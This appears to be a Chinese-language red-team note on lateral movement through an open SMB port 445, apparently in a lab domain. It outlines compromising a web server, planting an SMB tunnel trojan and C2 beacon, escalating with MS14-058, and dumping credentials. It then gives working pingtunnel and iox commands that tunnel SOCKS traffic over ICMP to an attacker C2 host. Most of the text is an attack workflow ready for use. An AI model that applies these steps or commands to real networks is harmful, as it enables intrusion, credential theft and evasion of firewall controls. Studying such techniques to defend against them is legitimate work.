SMB-开防火墙入站只445:
可用于文件打印和共享
smb和上面两个icmp和dns不一样,他是为了解决入站问题
SMB一般在防火墙入站默认是开启的,判断目标端口是否开放
适用场景:防火墙放行的入口打不下利用放行的SMB移动获取权限
利用条件:密码喷射或已知口令的情况下直接正向SMB横向移动拿下
大致流程:
域控192.168.3.21
web服务器ip192.168.3.31
sql服务器ip 192.168.3.33
web服务器开放445端口,web服务器拿到shell之后,上传smb隧道木马,c2上线,ms14-058提权从webadmin到system,再cs获取密码凭证,再新建web反向监听地址192.168.3.31端口为6666 ,再横向到3.33,web服务器中转代理当作跳板机
1、2场景后续穿透问题
1、Pingtunel配合iox代理Socks内网穿透
2、dnscat2(DNS)配合上线
C2:
接收客户端传递的ICMP
./pingtunnel -type server -noprint 1 -nolog 1 -key 000000
将本地4455转至5566端口
./iox proxy -l 4455 -l 5566
Web
将本地2222的TCP封装IMCP给192.168.139.141:4455
pingtunnel -type client -l 127.0.0.1:2222 -s 192.168.139.141 -t 192.168.139.141:4455 -tcp 1 -noprint 1 -nolog 1 -key 000000
建立SockS节点绑定2222端口:
iox.exe proxy -r 127.0.0.1:2222
此时在windows上proxifier可以加载节点配置就可以访问web服务